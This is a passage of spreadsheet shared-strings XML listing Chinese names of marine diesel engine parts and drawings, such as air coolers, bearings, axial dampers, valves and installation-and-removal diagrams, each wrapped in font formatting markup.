      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气软管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>精密无缝钢管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气分离器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀空气弹簧管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全和报警装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警模块原理图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶阀辅助工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属软管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放大器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锚定板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角钢管支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刃边角钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锐边角钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直角温度计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直角接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度撬棒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>退货说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆灯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>耐磨环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气缸布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制设备布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排放管布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器升压器布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口管布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速传感器布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机联锁布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓孔布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭震仪布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥测温度计布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链张紧支架装配图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸缘式电机安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞的安装和拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器的安装和拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩垫片的安装和拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电机安装和拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电机安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装和拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装与拆解装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装和拆卸装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起吊装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端楔块螺栓组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函的安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配模板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表面粗糙度评定</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器安装和拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩垫片安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器拆装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机拆装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器传动组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油嘴保持圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴钻孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动润滑器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自清滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机开关箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机开关箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向振动检测系统控制箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向振动检测系统传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力球轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向膨胀节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向振动监测装配图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>皮卡套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加强板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电木球</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡重</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚珠轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球伐</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球手柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带调节口球阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球阀规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基础加工</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮齿形</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基础站立图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈钢板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡口插头</t>
    </r>
  </si>
  <si>
    <r>
      <t>BBC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洁（水）管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦毛坯订货图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承盖订货图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
